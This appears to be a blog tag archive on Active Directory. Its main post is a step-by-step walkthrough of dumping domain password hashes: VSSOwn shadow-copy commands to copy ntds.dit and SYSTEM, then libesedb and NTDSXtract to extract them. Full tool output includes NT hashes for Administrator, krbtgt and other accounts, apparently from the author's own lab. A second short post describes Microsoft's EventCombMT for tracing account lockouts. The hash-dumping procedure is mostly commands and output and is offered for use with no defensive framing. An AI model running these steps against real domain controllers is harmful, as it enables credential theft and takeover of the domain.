Tag Archive: active directory


Active Directory Password Dump

So I’ve seen a few posts on dumping password hashes from active directory. So the concept is pretty simple, you use VSS (Volume Shadow Copy) to copy the SYSTEM and ntds.dit files, then you can use a tool written by Csaba Barta to extract the hashes. Since VSS is enabled by default on 2008, this should be pretty simple. There is a VBScript out that will do this for you, it’s called VSSOwn. I was able to create copies of the SYSTEM and ntds.dit files, but was not able to extract the hashes, why? Csaba Barta’s tool doesnt currently work with 64bit systems, bummer. Since i dont have a 32bit version to test with i’m out of luck. Anyway a nice write-up is available here

Update –

Decided to try it again, since a 64-bit version of the tool was released. So first run

cscript vssown.vbs /create

To create the volume shadow copy then run

cscript vssown.vbs /list

To confirmed that it worked, then copy the SYSTEM and ntds.dit files.

Download libesedb and NTDXtract (current version is 1.0).

Then run the following:

root@bt:~# cd libesedb-20120102/ 
root@bt:~/libesedb-20120102# ./configure  && make

Lots of text scrolls by ūüôā

root@bt:~/libesedb-20120102# cd esedbtools/ 
root@bt:~/libesedb-20120102/esedbtools# ./esedbexport /root/ntds.dit esedbexport 20120102 Opening file. 
Exporting table 1 (MSysObjects) out of 12. 
Exporting table 2 (MSysObjectsShadow) out of 12. 
Exporting table 3 (MSysUnicodeFixupVer2) out of 12. 
Exporting table 4 (datatable) out of 12. 
Exporting table 5 (hiddentable) out of 12. 
Exporting table 6 (link_table) out of 12. 
Exporting table 7 (sdpropcounttable) out of 12. 
Exporting table 8 (sdproptable) out of 12. 
Exporting table 9 (sd_table) out of 12. 
Exporting table 10 (MSysDefrag2) out of 12. 
Exporting table 11 (quota_table) out of 12. 
Exporting table 12 (quota_rebuild_progress_table) out of 12. 
Export completed. 
root@bt:~/libesedb-20120102/esedbtools# cd ntds.dit.export/ 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# ls 
datatable.3    
MSysObjects.0                    
quota_table.10 
hiddentable.4  
MSysObjectsShadow.1              
sdpropcounttable.6 
link_table.5   
MSysUnicodeFixupVer2.2           
sdproptable.7 
MSysDefrag2.9  
quota_rebuild_progress_table.11  
sd_table.8 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp datatable.3 /root 
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp link_table.5 /root 

Now we can use dsusers.py to extract the hashes

 root@bt:~/NTDSXtract 1.0# python ./dsusers.py /root/datatable.3 /root/link_table.5 --passwordhashes /root/SYSTEM 
Running with options: Extracting password hashes Initialising engine... 
Scanning database - 100% -> 3491 records processed 
Extracting schema information - 100% -> 1549 records processed 
Extracting object links... 
List of users: ============== 
Record ID:           3562 
User name:           Administrator 
User principal name: 
SAM Account name:    Administrator 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: aa7020f0-d702-4608-bb51-4f9901113317 
SID:  S-1-5-21-2539783424-2987255661-3794136379-500 
When created:         2011-09-18 16:19:03 
When changed:         2012-02-05 15:24:36 
Account expires:      Never 
Password last set:    2012-02-05 15:24:36.328125 
Last logon:           2012-02-05 15:25:12.078125 
Last logon timestamp: 2012-02-05 15:24:36.328125 
Bad password time     2012-02-05 15:23:29.375000 
Logon count:          25 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users Administrator 
Password hashes: Administrator:$NT$9bff06fe611486579fb74037890fda96::: 
Record ID:           3563 
User name:           Guest 
User principal name: 
SAM Account name:    Guest 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 01b08029-af28-4f0b-a6be-e39a9eff6bfa 
SID:  S-1-5-21-2539783424-2987255661-3794136379-501 
When created:         2011-09-18 16:19:04 
When changed:         2011-09-18 16:19:04 
Account expires:      Never 
Password last set:    Never 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled 
PWD Not Required NORMAL_ACCOUNT PWD Never Expires 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users Guest 
Password hashes: 
Record ID:           3609 
User name:           krbtgt 
User principal name: 
SAM Account name:    krbtgt 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 290688a7-60a4-4baa-b860-33eda516793a 
SID:  S-1-5-21-2539783424-2987255661-3794136379-502 
When created:         2011-09-18 16:22:35 
When changed:         2011-09-18 16:37:59 
Account expires:      Never 
Password last set:    2011-09-18 16:22:35.843750 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled 
NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users krbtgt 
Password hashes: krbtgt:$NT$ef9fde1c17c72af73beb84f7702724c9::: 
Record ID:           3763 
User name:           keith 
User principal name: keith@keithsoffice.us 
SAM Account name:    keith 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 74f63277-6bed-42ea-bdd9-4c9498c2f1d3 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1103 
When created:         2011-09-18 16:57:38 
When changed:         2012-02-05 15:23:54 
Account expires:      Never 
Password last set:    2012-02-05 15:23:54.203125 
Last logon:           2012-02-05 15:23:55.812500 
Last logon timestamp: 2012-02-05 15:23:54.187500 
Bad password time     2011-12-11 04:24:51.625875 
Logon count:          15 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users keith 
Password hashes: keith:$NT$8c3efc486704d2ee71eebe71af14d86c::: 
Record ID:           3764 
User name:           keith domain admin 
User principal name: keith-dm@keithsoffice.us 
SAM Account name:    keith-dm 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 7fbe82fd-eb65-4862-8626-d2127add7283 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1104 
When created:         2011-09-18 16:58:24 
When changed:         2011-10-04 01:58:23 
Account expires:      Never 
Password last set:    2011-10-04 01:57:08.171875 
Last logon:           2011-10-04 02:01:29.359375 
Last logon timestamp: 2011-10-04 01:58:23.781250 
Bad password time     2011-09-18 20:54:49.250000 
Logon count:          9 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice 
Users keith domain admin 
Password hashes: keith domain admin:$NT$58a478135a93ac3bf058a5ea0e8fdb71::: 

Have Fun!

Sources: http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

VSSOwn

Account lockout tool

This post is mainly for reference purpose. Have you ever had an network account that kept getting locked out and didn’t know why? EventCombMT is a tool provided by Microsoft (included with Microsoft Account Lockout Management Tools) that will allow you to search for lockout events and will identify the computer in which is causing the account to be locked.

It doesn’t tell you why, but once you have the computer which is causing it you can investigate further.